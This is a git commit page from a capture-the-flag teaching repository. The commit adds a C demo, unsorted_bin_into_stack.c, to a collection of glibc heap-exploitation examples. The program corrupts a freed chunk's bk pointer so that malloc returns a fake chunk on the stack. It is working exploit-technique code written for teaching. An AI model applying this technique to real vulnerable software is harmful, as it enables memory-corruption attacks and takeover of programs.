nganhkhoa/CTF-All-In-One
1
0
Fork 0
mirror of https://github.com/nganhkhoa/CTF-All-In-One.git synced 2025-06-24 04:05:03 +07:00
Code Issues Projects Releases Wiki Activity

add unsorted_bin_into_stack

Browse Source
This commit is contained in:
firmianay
2018-06-05 19:37:30 +08:00
parent fde29fc586
commit b512426901
4 changed files with 180 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
src/others/3.1.6_heap_exploit/Makefile
View File

@ -1,4 +1,4 @@
PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore tcache_house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack tcache_unsorted_bin_attack house_of_einherjar house_of_orange
PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore tcache_house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack unsorted_bin_into_stack tcache_unsorted_bin_attack house_of_einherjar house_of_orange
CFLAGS += -std=c99 -g
# CFLAGS += -fsanitize=address

2
src/others/3.1.6_heap_exploit/unsorted_bin_attack.c
View File

@ -5,7 +5,7 @@ int main() {
unsigned long stack_var = 0;
fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
unsigned long *p = malloc(0x80);
unsigned long *p = malloc(0x80);
unsigned long *p1 = malloc(0x10);
fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);

36
src/others/3.1.6_heap_exploit/unsorted_bin_into_stack.c Normal file
View File

@ -0,0 +1,36 @@
#include <stdio.h>
#include <stdlib.h>
int main() {
unsigned long stack_buf[4] = {0};
unsigned long *victim = malloc(0x80);
unsigned long *p1 = malloc(0x10);
fprintf(stderr, "Allocating the victim chunk at %p\n", victim);
// deal with tcache
// int *k[10], i;
// for (i = 0; i < 7; i++) {
// k[i] = malloc(0x80);
// }
// for (i = 0; i < 7; i++) {
// free(k[i]);
// }
free(victim);
fprintf(stderr, "Freeing the chunk, it will be inserted in the unsorted bin\n\n");
stack_buf[1] = 0x100 + 0x10;
stack_buf[3] = (unsigned long)stack_buf; // or any other writable address
fprintf(stderr, "Create a fake chunk on the stack\n");
fprintf(stderr, "fake->size: %p\n", (void *)stack_buf[1]);
fprintf(stderr, "fake->bk: %p\n\n", (void *)stack_buf[3]);
victim[1] = (unsigned long)stack_buf;
fprintf(stderr, "Now we overwrite the victim->bk pointer to stack: %p\n\n", stack_buf);
fprintf(stderr, "Malloc a chunk which size is 0x110 will return the region of our fake chunk: %p\n", &stack_buf[2]);
unsigned long *fake = malloc(0x100);
fprintf(stderr, "malloc(0x100): %p\n", fake);
}